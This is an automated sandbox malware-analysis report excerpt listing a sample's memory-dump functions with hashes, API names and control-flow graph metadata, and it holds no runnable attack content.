                                                  • Opcode ID: a30cc043a45c22dbcd22b24d3857e76e08b5e7a4a3fa1fc91dd9a3595e07fb6d
                                                  • Instruction ID: 416a2e588fc6d94019dd6dd141410fa968f9d6df5a0f8b6f1cacdd1406157a5e
                                                  • Opcode Fuzzy Hash: a30cc043a45c22dbcd22b24d3857e76e08b5e7a4a3fa1fc91dd9a3595e07fb6d
                                                  • Instruction Fuzzy Hash: 58418B71E002198FCB74DFA9D880AAFBBB2EB85310F10492AE216DB250D331E9558B91
                                                  Function 06A3D9C8 Relevance: .1, Instructions: 102COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2ac1683762126586682477a83d3b1e6070d7c78b51b4f715e8a98d357a755ab4
                                                  • Instruction ID: 011f3d3aa6f4393e6276b5dc2374a110a475584112c5f3a004009aa7f51ac955
                                                  • Opcode Fuzzy Hash: 2ac1683762126586682477a83d3b1e6070d7c78b51b4f715e8a98d357a755ab4
                                                  • Instruction Fuzzy Hash: 7C31A130E1031ADBCB65EF64D990A9EBBB6FF85304F108529E405EB605EB70A946CB81
                                                  Function 06A320B0 Relevance: .1, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a6bc10e7cc4681c0cc4027d9e9327c98ea054cf0148af5748c9d3cbf6cc8ec30
                                                  • Instruction ID: 05112ac9a4693f47c46d3eff9ec2d467bb35bef75cc1d706597153b7c973f706
                                                  • Opcode Fuzzy Hash: a6bc10e7cc4681c0cc4027d9e9327c98ea054cf0148af5748c9d3cbf6cc8ec30
                                                  • Instruction Fuzzy Hash: 9031CD31E0021A9FCB45DF64D954B9EF7B2EF89300F108429E91AEB350EB71AD46CB90
                                                  Function 06A320C0 Relevance: .1, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ef85bc5339217985654c6f0e07b5b7a59a3563a044c6a4f9c4052f368f63c04
                                                  • Instruction ID: a7edc3763ddac3102bfe65190e83e76a6b4d94a1df3d68ee34281c9b56cb6b4f
                                                  • Opcode Fuzzy Hash: 1ef85bc5339217985654c6f0e07b5b7a59a3563a044c6a4f9c4052f368f63c04
                                                  • Instruction Fuzzy Hash: 85318030E006199FCB55DF64D954B9EF7B2BF89300F108529E90AEB350EB71AD46CB90
                                                  Function 06A33EF8 Relevance: .1, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4c7878771c282e17e51e0254593c24710a2e64e8d7f04200bbb30d5a5e5f15e0
                                                  • Instruction ID: 40642849fed085b78de6db727f50dda279cc8d91d8e872d9643137ea336dfa23
                                                  • Opcode Fuzzy Hash: 4c7878771c282e17e51e0254593c24710a2e64e8d7f04200bbb30d5a5e5f15e0
                                                  • Instruction Fuzzy Hash: 41212575F042259FDF50EFA9D980AAEBBF5EB48610F50802AF905EB340E731DD418B91
                                                  Function 06A33EE9 Relevance: .1, Instructions: 77COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 42b0baad8b324f034af8150be1989e963e99d1db1c5ac9555ee968138ef0e7aa
                                                  • Instruction ID: db80095ce768c2e8fa242556dbb96a8d0aedfc8c61ba6eaa272b51f9b5806075
                                                  • Opcode Fuzzy Hash: 42b0baad8b324f034af8150be1989e963e99d1db1c5ac9555ee968138ef0e7aa
                                                  • Instruction Fuzzy Hash: 67212675F102259FDF50EF68D980AAEB7F5EB88210F508026F905EB350E735D9518B91
                                                  Function 00FDD005 Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2239585356.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_fdd000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ffd29575e64ea8e67b19f79eb1ed62c4f97eb53dd7147905501fdcbe56e65a6e
                                                  • Instruction ID: 67cfe061b70f00551853b07d4ee86e94778f544b63ea321287425b5db7721fd5
                                                  • Opcode Fuzzy Hash: ffd29575e64ea8e67b19f79eb1ed62c4f97eb53dd7147905501fdcbe56e65a6e
                                                  • Instruction Fuzzy Hash: D3214D7150D3C09FD703CB24D994711BF71AB86214F29C5DBD8858F2A7C23A980ADB62
                                                  Function 00FDD030 Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2239585356.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_fdd000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ef508d753d8444296732f90964a135b381005c9ba4a0866c603cd292d4f6e184
                                                  • Instruction ID: 0e0b98d179036c9a759d754c34a0d5aadf1bfec5af9017a4a3dfca885c9d6fa7
                                                  • Opcode Fuzzy Hash: ef508d753d8444296732f90964a135b381005c9ba4a0866c603cd292d4f6e184
                                                  • Instruction Fuzzy Hash: 6321F571504204DFDB15DF14D984B26BB66FBC4324F28C56AD90A4B35AC33AD846EA62
                                                  Function 06A34240 Relevance: .1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 312b0ef3b28dae17a9ede5755c4560ce455a05c4d7ffd4df58aea37273e71e91
                                                  • Instruction ID: 72ec9abafb28a0af5d4792be9ca946fdb234058fac1556dbfc5bc9327d6574de
                                                  • Opcode Fuzzy Hash: 312b0ef3b28dae17a9ede5755c4560ce455a05c4d7ffd4df58aea37273e71e91
                                                  • Instruction Fuzzy Hash: 06012230B002210FCB61AAEDD910BABB7DBDFC9710F10846AF50ADB341DE24CC024395
                                                  Function 06A34008 Relevance: .1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 709efbace9df3c57668a2d4795efa4f654591f675080720be71a1ac675f72bd1
                                                  • Instruction ID: 78a696b85b677b835dad6b7c52f2e8df6095b02af1e85d7f73a4d1dfc2e9516a
                                                  • Opcode Fuzzy Hash: 709efbace9df3c57668a2d4795efa4f654591f675080720be71a1ac675f72bd1
                                                  • Instruction Fuzzy Hash: FA116132B101259FDF58A668D8146AE73EAEBCD211F108539D50AEB344EF69DC068BD2
                                                  Function 06A3A350 Relevance: .1, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 60a29b6351760fb2431b13cba225de0e8d0897cae7401a8956179f8c108e926c
                                                  • Instruction ID: 5f8973fb42e33423f24f57e47aad41d3dd514f4fd5f45ca5362f404b34bb4060
                                                  • Opcode Fuzzy Hash: 60a29b6351760fb2431b13cba225de0e8d0897cae7401a8956179f8c108e926c
                                                  • Instruction Fuzzy Hash: AA0128397002215FC752AB38D850BAFB7DAEB86710F104539F64ACB351DE25DD428381
                                                  Function 06A33FF9 Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1c6605d07ea8dce440e9a8780636393fa84f8f7e84fe93bda1f59b9f04a0e4c0
                                                  • Instruction ID: 2df67bdbb259f232017f3f7499a146031aa1af7507fff7a32c884f70ccf7e0cb
                                                  • Opcode Fuzzy Hash: 1c6605d07ea8dce440e9a8780636393fa84f8f7e84fe93bda1f59b9f04a0e4c0
                                                  • Instruction Fuzzy Hash: E101BC32B100265BDF54A668DC247EB76EB9BC9611F01813AE11AE7294EF29CC0347E2
                                                  Function 06A33CC0 Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 55511c88f1bd06eaa2f0023d70df75979c5d4df72f5efcbaf1229d36434015c0
                                                  • Instruction ID: 6c65f2a1c27a6125cc01c076775e00b709b371cffefc832611cd946973dc795e
                                                  • Opcode Fuzzy Hash: 55511c88f1bd06eaa2f0023d70df75979c5d4df72f5efcbaf1229d36434015c0
                                                  • Instruction Fuzzy Hash: D221F4B1D01259AFCB00DF9AD884ADEFBF8FF48310F10812AE918A7200C378A554CFA5
                                                  Function 06A3F1F8 Relevance: .1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f5fd82f8428500c1ccfef51bed0587c3bf7d510d00c29c5e16435b1b64d51c2a
                                                  • Instruction ID: 22fad43e9c775412d32edbfa20d2be64a09875d7ab0510a2048a91c097f5e258
                                                  • Opcode Fuzzy Hash: f5fd82f8428500c1ccfef51bed0587c3bf7d510d00c29c5e16435b1b64d51c2a
                                                  • Instruction Fuzzy Hash: 34012436F200614FCB65A2B89460B6FA7C6DBC9214F0088B9F50ECB341CE24DC434381
                                                  Function 06A33CC8 Relevance: .1, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a57dad3f351fecd1e901b43f11e5da60611b475f88ce07e0c042de974debc9f6
                                                  • Instruction ID: 1580094d333fa14d551909427667356698916fbf92fbae93ae06e6c44f3ce75c
                                                  • Opcode Fuzzy Hash: a57dad3f351fecd1e901b43f11e5da60611b475f88ce07e0c042de974debc9f6
                                                  • Instruction Fuzzy Hash: C111B3B5D01259AFCB00DF9AD884ADEFFF4FB49710F10852AE518A7240C378A554CFA5
                                                  Function 06A34250 Relevance: .1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 44160ce133de46e1c74099897c7129dcefdf415278b8ae39bc007de1801f7833
                                                  • Instruction ID: 0094cfde413e950cee05d4ca6c2cfe0df59e4dec7451cf91a79e4925178d0010
                                                  • Opcode Fuzzy Hash: 44160ce133de46e1c74099897c7129dcefdf415278b8ae39bc007de1801f7833
                                                  • Instruction Fuzzy Hash: 6101AD31B005210BDB64A6EDD514B6AB6CADBC9711F10843AF60EDB340EE65DC024385
                                                  Function 06A3F208 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bdc38ddf0570d241acecce64b82d5d84e29381b134209fbd9979d3409ce54f8f
                                                  • Instruction ID: 6028effcfe356398fdb65b1f79380834bfda4cbb4d8d359ad39d342d89ad4368
                                                  • Opcode Fuzzy Hash: bdc38ddf0570d241acecce64b82d5d84e29381b134209fbd9979d3409ce54f8f
                                                  • Instruction Fuzzy Hash: 0A01D139F201214FCB65A6ADA554B2EB6CADBC9624F10847AF50ECB350DE25DC034385
                                                  Function 06A3A360 Relevance: .0, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 367e82fe763a261c7006bc56e417745754a8ab310a3c9f5d35892815029bbab6
                                                  • Instruction ID: 048130fb31824e505f0fd3f4567cfba1ba6b2f9cb9bb8d03f0e0f74267d0c22c
                                                  • Opcode Fuzzy Hash: 367e82fe763a261c7006bc56e417745754a8ab310a3c9f5d35892815029bbab6
                                                  • Instruction Fuzzy Hash: 18018135B101254BCB55AB78D450B2EB3D6EB89714F108428F64ECB354EE25DC468781
                                                  Function 06A364B8 Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c949806674b15ebeae97a3a5d3a43be2fc99bcf0521cbb443e59a459260b97c5
                                                  • Instruction ID: d99ff77b3a583ca703045a62d9e43fb9512165157894cbdb09c18a79ad3daea6
                                                  • Opcode Fuzzy Hash: c949806674b15ebeae97a3a5d3a43be2fc99bcf0521cbb443e59a459260b97c5
                                                  • Instruction Fuzzy Hash: D9E09270E182696BDB60DF709B5535A77ACDB02204F2044AAF844CB106E275DE018790

                                                  Non-executed Functions

                                                  Function 06A376E8 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-2843079600
                                                  • Opcode ID: 95ed0c1bc9f7025a5f714cbd8ed7d123fa77b864443c0b3867d6c8ab68f600ad
                                                  • Instruction ID: 06349e2065c0d07a3feb8091f4bdbc50cd246f2a6ccaa7792b7e0a1b9104317e
                                                  • Opcode Fuzzy Hash: 95ed0c1bc9f7025a5f714cbd8ed7d123fa77b864443c0b3867d6c8ab68f600ad
                                                  • Instruction Fuzzy Hash: 2D122E70E002298FDB64EF65C994AADB7F6BF84304F208569E40AAB354EB31DD45CF85
                                                  Function 06A3A980 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-1273862796
                                                  • Opcode ID: 62ad0814bcc7d60f356bf6aaf48971513f1835baebb1f10e683cbc6380c636c0
                                                  • Instruction ID: 7f59e43e9fdc2096c4f7684b0d4f67b0aa8e8900ff27cc1a5292f09e35b7cc3d
                                                  • Opcode Fuzzy Hash: 62ad0814bcc7d60f356bf6aaf48971513f1835baebb1f10e683cbc6380c636c0
                                                  • Instruction Fuzzy Hash: 69919130E00229DFDBA8EFA5D994B6EB7F6FF44300F108429E981AB254DB359D45CB90
                                                  Function 06A370E8 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-981061697
                                                  • Opcode ID: 8fe92edff962c18253686480bc018a79a756ba38fa356901f2170e1b31c15035
                                                  • Instruction ID: 9fe9f6c5554a89d1c7b8076aeafcfe6db07aac4dbb32e14e7798d6e917459db0
                                                  • Opcode Fuzzy Hash: 8fe92edff962c18253686480bc018a79a756ba38fa356901f2170e1b31c15035
                                                  • Instruction Fuzzy Hash: 0EF15070B00215CFDB59EFA5D994B6EB7B6BF84300F248468E8059B368DB35EC42CB95
                                                  Function 06A38418 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434
                                                  • Opcode ID: 3969d0745640e78783e9dab0674154dff9db6bc30aeb9a3c4ec3dd2da0e85fe6
                                                  • Instruction ID: 866e971aff11faeb96fafab566b9f0ec3e74e5971c41064da81ffc61914a0c8e
                                                  • Opcode Fuzzy Hash: 3969d0745640e78783e9dab0674154dff9db6bc30aeb9a3c4ec3dd2da0e85fe6
                                                  • Instruction Fuzzy Hash: 72B12D30A102198FDB58EF69D990BAEB7B6FF84304F248429E405DB355DB79DC86CB81
                                                  Function 06A38830 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR]q$LR]q$$]q$$]q
                                                  • API String ID: 0-3527005858
                                                  • Opcode ID: bc5a00fd6476329629afb8c3e836b5109d1a71473f294872b521054c1e6ee888
                                                  • Instruction ID: 213d69ffc43775100e47384c64b0d6c54f48a44495f37cd98b3e4a0d3dc770bc
                                                  • Opcode Fuzzy Hash: bc5a00fd6476329629afb8c3e836b5109d1a71473f294872b521054c1e6ee888
                                                  • Instruction Fuzzy Hash: 1C518C30B002119FDB58EB28D991B6AB7FAFF84344F148568F406DB3A9DA34EC45CB91
                                                  Function 06A3AD13 Relevance: 5.2, Strings: 4, Instructions: 157COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2258163837.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_6a30000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434
                                                  • Opcode ID: 95917d143748ab648f4db4cc8017c10d9c15f60ca89889aecc14b698282d2524
                                                  • Instruction ID: 8cbbefa0322a369746b386dae769f82d3db0cf06d3a283f17ad3eb41862883c9
                                                  • Opcode Fuzzy Hash: 95917d143748ab648f4db4cc8017c10d9c15f60ca89889aecc14b698282d2524
                                                  • Instruction Fuzzy Hash: 1B51A230A102258FCFA9EB64D980AADB3F6EF85340F248529E945EB354DB35DC41CB91

                                                  Execution Graph

                                                  Execution Coverage:7.7%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:39
                                                  Total number of Limit Nodes:4
                                                  execution_graph 21970 2884668 21971 288467a 21970->21971 21972 2884686 21971->21972 21974 2884779 21971->21974 21975 288477c 21974->21975 21979 2884888 21975->21979 21983 2884878 21975->21983 21981 28848af 21979->21981 21980 288498c 21980->21980 21981->21980 21987 2884248 21981->21987 21985 288487c 21983->21985 21984 288498c 21984->21984 21985->21984 21986 2884248 CreateActCtxA 21985->21986 21986->21984 21988 2885918 CreateActCtxA 21987->21988 21990 28859db 21988->21990 21991 288ad68 21994 288ae50 21991->21994 21992 288ad77 21995 288ae94 21994->21995 21996 288ae71 21994->21996 21995->21992 21996->21995 21997 288b098 GetModuleHandleW 21996->21997 21998 288b0c5 21997->21998 21998->21992 21999 288d218 22000 288d25e 21999->22000 22004 288d3f8 22000->22004 22007 288d3e7 22000->22007 22001 288d34b 22005 288d426 22004->22005 22010 288b4c0 22004->22010 22005->22001 22008 288b4c0 DuplicateHandle 22007->22008 22009 288d426 22008->22009 22009->22001 22011 288d460 DuplicateHandle 22010->22011 22013 288d4f6 22011->22013 22013->22005 22014 4f78f60 22015 4f78f64 22014->22015 22016 4f790eb 22015->22016 22018 4f76b08 22015->22018 22019 4f791e0 PostMessageW 22018->22019 22020 4f7924c 22019->22020 22020->22015

                                                  Executed Functions

                                                  Function 0288AE50 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 202COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 295 288ae50-288ae6f 296 288ae9b-288ae9f 295->296 297 288ae71-288ae7e call 2889dc0 295->297 299 288aea1-288aeab 296->299 300 288aeb3-288aef4 296->300 303 288ae80 297->303 304 288ae94 297->304 299->300 306 288af01-288af0f 300->306 307 288aef6-288aefe 300->307 352 288ae86 call 288b4f8 303->352 353 288ae86 call 288b4e9 303->353 354 288ae86 call 288b4d0 303->354 304->296 308 288af11-288af16 306->308 309 288af33-288af35 306->309 307->306 311 288af18-288af1f call 2889dcc 308->311 312 288af21 308->312 314 288af38-288af3f 309->314 310 288ae8c-288ae8e 310->304 313 288afd0-288b04e 310->313 316 288af23-288af31 311->316 312->316 345 288b050-288b053 313->345 346 288b054-288b090 313->346 317 288af4c-288af53 314->317 318 288af41-288af49 314->318 316->314 321 288af60-288af69 call 2889ddc 317->321 322 288af55-288af5d 317->322 318->317 326 288af6b-288af73 321->326 327 288af76-288af7b 321->327 322->321 326->327 328 288af99-288afa6 327->328 329 288af7d-288af84 327->329 336 288afa8-288afc6 328->336 337 288afc9-288afcf 328->337 329->328 331 288af86-288af96 call 2889dec call 2889dfc 329->331 331->328 336->337 345->346 347 288b098-288b0c3 GetModuleHandleW 346->347 348 288b092-288b095 346->348 349 288b0cc-288b0e0 347->349 350 288b0c5-288b0cb 347->350 348->347 350->349 352->310 353->310 354->310
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0288B0B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2240729304.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2880000_adobe.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID: $O$$O
                                                  • API String ID: 4139908857-2259736977
                                                  • Opcode ID: eb79cba83785724944db19c5b3449e6741d940b17b4e1f4b1a3894b0e53475a2
                                                  • Instruction ID: b14b1dfc79bcba7ae83ae1a6b5d6b48cc0872ada081e5ec1d0bc4cb90526cd66
                                                  • Opcode Fuzzy Hash: eb79cba83785724944db19c5b3449e6741d940b17b4e1f4b1a3894b0e53475a2
                                                  • Instruction Fuzzy Hash: EA8145B8A00B458FD728EF29D54075ABBF1FF88304F00892AD49AD7A90D774E849CB95
                                                  Function 0288590D Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 464 288590d-288590e 465 2885910-2885912 464->465 466 2885914 464->466 465->466 467 2885918-28859d9 CreateActCtxA 465->467 466->467 469 28859db-28859e1 467->469 470 28859e2-2885a3c 467->470 469->470 477 2885a4b-2885a4f 470->477 478 2885a3e-2885a41 470->478 479 2885a60-2885a90 477->479 480 2885a51-2885a5d 477->480 478->477 484 2885a42-2885a47 479->484 485 2885a92-2885b14 479->485 480->479 484->477
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 028859C9
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2240729304.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2880000_adobe.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 173ef21437994d489e00fd3389acd98ac4edf7d8dde287cb7792f8167abd8a87
                                                  • Instruction ID: 03aaef3188e22797f5c360e92d46dc8335aec47dbd43c17f38d47a9b59383f8d
                                                  • Opcode Fuzzy Hash: 173ef21437994d489e00fd3389acd98ac4edf7d8dde287cb7792f8167abd8a87
                                                  • Instruction Fuzzy Hash: 5241F2B4C00619CFDB24DFA9C884B9DBBB5BF49704F60806AD408AB255DB75694ACF90
                                                  Function 02884248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 488 2884248-28859d9 CreateActCtxA 491 28859db-28859e1 488->491 492 28859e2-2885a3c 488->492 491->492 499 2885a4b-2885a4f 492->499 500 2885a3e-2885a41 492->500 501 2885a60-2885a90 499->501 502 2885a51-2885a5d 499->502 500->499 506 2885a42-2885a47 501->506 507 2885a92-2885b14 501->507 502->501 506->499
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 028859C9
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2240729304.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2880000_adobe.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
